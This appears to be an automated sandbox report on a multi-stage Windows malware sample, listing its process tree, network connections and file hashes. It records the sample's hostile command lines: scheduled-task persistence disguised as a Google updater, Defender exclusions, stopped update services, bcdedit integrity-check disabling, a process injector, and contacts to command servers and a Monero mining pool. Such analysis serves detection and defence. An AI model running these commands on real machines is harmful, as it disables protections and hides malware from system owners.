PID 2652 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\SysWOW64\WerFault.exe
PID 1204 wrote to memory of 3068 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8EC8.exe
PID 1204 wrote to memory of 3068 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8EC8.exe
PID 1204 wrote to memory of 3068 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8EC8.exe
PID 1204 wrote to memory of 3068 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8EC8.exe
PID 1204 wrote to memory of 3068 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8EC8.exe
PID 1204 wrote to memory of 3068 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8EC8.exe
PID 1204 wrote to memory of 3068 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8EC8.exe
PID 3068 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe
PID 3068 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe
PID 3068 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe
PID 3068 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe
PID 3068 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe
PID 3068 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe
PID 3068 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe
PID 1204 wrote to memory of 2588 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8FF1.exe
PID 1204 wrote to memory of 2588 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8FF1.exe
PID 1204 wrote to memory of 2588 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8FF1.exe
PID 1204 wrote to memory of 2588 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8FF1.exe
PID 2520 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe
PID 2520 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe
PID 2520 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe
PID 2520 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe
PID 2520 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe
PID 2520 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe
PID 2520 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe
PID 1204 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9169.bat
PID 1204 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9169.bat
PID 1204 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9169.bat
PID 1204 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9169.bat
PID 2244 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\9169.bat C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\9169.bat C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\9169.bat C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\9169.bat C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe

"C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 36

C:\Users\Admin\AppData\Local\Temp\8EC8.exe

C:\Users\Admin\AppData\Local\Temp\8EC8.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe

C:\Users\Admin\AppData\Local\Temp\8FF1.exe

C:\Users\Admin\AppData\Local\Temp\8FF1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe

C:\Users\Admin\AppData\Local\Temp\9169.bat

"C:\Users\Admin\AppData\Local\Temp\9169.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\91A5.tmp\91A6.tmp\91A7.bat C:\Users\Admin\AppData\Local\Temp\9169.bat"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 132

C:\Users\Admin\AppData\Local\Temp\933E.exe

C:\Users\Admin\AppData\Local\Temp\933E.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1oS28ea9.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1oS28ea9.exe

C:\Users\Admin\AppData\Local\Temp\96E7.exe

C:\Users\Admin\AppData\Local\Temp\96E7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 476 -s 280

C:\Users\Admin\AppData\Local\Temp\9B4B.exe

C:\Users\Admin\AppData\Local\Temp\9B4B.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\C6FD.exe

C:\Users\Admin\AppData\Local\Temp\C6FD.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010204433.log C:\Windows\Logs\CBS\CbsPersist_20231010204433.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\22A.exe

C:\Users\Admin\AppData\Local\Temp\22A.exe

C:\Users\Admin\AppData\Local\Temp\129F.exe

C:\Users\Admin\AppData\Local\Temp\129F.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 484

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=22A.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0

C:\Users\Admin\AppData\Local\Temp\1CAE.exe

C:\Users\Admin\AppData\Local\Temp\1CAE.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1588 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\taskeng.exe

taskeng.exe {E69C88C7-497A-4373-916E-0EE7071C8A6D} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1585636847461022073-1021634371-829412550-2552042784383148219734653501232614398"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1273765351-141908494011204511641458904720117405426117428168981964706015-328136547"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {582C031E-01DA-459F-879E-DAD6EDAADC53} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 194.169.175.127:80 host-host-file8.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 8.8.8.8:53 bytecloudasa.website udp
NL 85.209.176.171:80 85.209.176.171 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 api.ip.sb udp
US 8.8.8.8:53 62e2cb15-1fec-4f11-acb6-ed26c4d06b79.uuid.cdntokiog.studio udp
US 104.26.12.31:443 api.ip.sb tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 8.8.8.8:53 stun.ipfire.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server14.cdntokiog.studio udp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 162.159.130.233:443 cdn.discordapp.com tcp
BG 185.82.216.49:443 server14.cdntokiog.studio tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

MD5 c268c396b0a43fb327966b84bb7a85e3
SHA1 88ef7629b07cdb0898d4c527074ac0b2257f7635
SHA256 9d8281522d4b63cffa01f617607c8000c94c4381ab4b1fa9f7f7d386efb32d7d
SHA512 f637c9ac797bbca1bd8684aa17197ed962ad290fe0512f010b257bae332f51b92ebb9a0f6adca3df74ee8cd3338e1a81ec851dd633fd14e7f35910e1d81ee7a1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

MD5 c268c396b0a43fb327966b84bb7a85e3
SHA1 88ef7629b07cdb0898d4c527074ac0b2257f7635
SHA256 9d8281522d4b63cffa01f617607c8000c94c4381ab4b1fa9f7f7d386efb32d7d
SHA512 f637c9ac797bbca1bd8684aa17197ed962ad290fe0512f010b257bae332f51b92ebb9a0f6adca3df74ee8cd3338e1a81ec851dd633fd14e7f35910e1d81ee7a1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

MD5 c268c396b0a43fb327966b84bb7a85e3
SHA1 88ef7629b07cdb0898d4c527074ac0b2257f7635
SHA256 9d8281522d4b63cffa01f617607c8000c94c4381ab4b1fa9f7f7d386efb32d7d
SHA512 f637c9ac797bbca1bd8684aa17197ed962ad290fe0512f010b257bae332f51b92ebb9a0f6adca3df74ee8cd3338e1a81ec851dd633fd14e7f35910e1d81ee7a1

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

MD5 c268c396b0a43fb327966b84bb7a85e3
SHA1 88ef7629b07cdb0898d4c527074ac0b2257f7635
SHA256 9d8281522d4b63cffa01f617607c8000c94c4381ab4b1fa9f7f7d386efb32d7d
SHA512 f637c9ac797bbca1bd8684aa17197ed962ad290fe0512f010b257bae332f51b92ebb9a0f6adca3df74ee8cd3338e1a81ec851dd633fd14e7f35910e1d81ee7a1

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
SHA512 9d38d33267df63078ad1d2435acdca5fb2c27c5aeeafb9916e28c385533d79a125c51e48675658a2babf30936c0a37da65575ad3958d856bb6bdbea2cdca4b3d

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
SHA512 9d38d33267df63078ad1d2435acdca5fb2c27c5aeeafb9916e28c385533d79a125c51e48675658a2babf30936c0a37da65575ad3958d856bb6bdbea2cdca4b3d

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
